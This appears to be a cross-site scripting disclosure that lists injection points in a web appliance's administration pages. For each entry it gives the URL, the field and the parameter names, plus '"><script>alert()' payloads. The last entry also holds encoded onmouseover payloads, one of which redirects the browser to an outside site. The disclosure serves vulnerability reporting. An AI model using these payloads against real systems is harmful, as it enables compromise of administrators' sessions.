

https://www.example.com/showSystemConfiguration.do?categoryId=821

CRLs ADD: "><script>alert(1);</script>

Parameter: propertyItem[25].value

====================================================================================


https://www.example.com/showAuditReports.do (Reports)

Username ADD: "><script>alert(1);</script>

Parameters: user
            account

====================================================================================


https://www.example.com/showSystemConfiguration.do?categoryId=14800

Files to Scan ADD: "><script>alert(1);</script>
Files to Exclude from Scanning ADD: "><script>alert(2);</script>
Files to Block ADD: "><script>alert(3);</script>

Parameters: propertyItem[1].value
            propertyItem[2].value
            propertyItem[3].value

====================================================================================


https://www.example.com/showSystemConfiguration.do?categoryId=810

Public Internal Web Sites ADD: "><script>alert(1);</script>
VPN Port ADD: "><script>alert(2);</script>

Parameters: propertyItem[1].value
            propertyItem[8].value

====================================================================================


https://www.example.com/showAvailableAccounts.do

Available Groups ADD: "><script>alert(1);</script>

Parameter: selectedRoles

====================================================================================


https://www.example.com/editMessage.do?actionTarget=sendMessageToUser&resourceName=user&realm=1&parent_name=edit

Account ADD: "><script>alert(1);</script>
Group ADD: "><script>alert(2);</script>
Policy ADD: "><script>alert(3);</script>

Parameter: policy

====================================================================================


https://www.example.com/editAccount.do?actionTarget=edit&username=guest&parent_name=edit

Available Groups ADD: "><script>alert(1);</script>
Authorized IP Addresses ADD: "><script>alert(2);</script>
Other Computers (Waks-On-LAN) ADD: "><script>alert(3);</script>

Parameters: selectedRoles
            propertyItem[1].value
            propertyItem[6].value

====================================================================================


https://www.example.com/editMessage.do?actionTarget=sendMessageToRole&resourceName=%22onmouseover=prompt%28%22XSS3%22%29%3E%0A%0DB&realm=9999&parent_name=edit
https://www.example.com/editMessage.do?actionTarget=sendMessageToRole&resourceName=CLICK%20ME%20PLEASE%20!!!%20ZOMG%20XSS%20INVISIBLE%20%22onmouseover=prompt%28document.location=%27http://zeroscience.mk%27%29%3E&realm=9999&parent_name=edit

Group ADD: "><script>alert(1);</script>

Parameter: resourceName


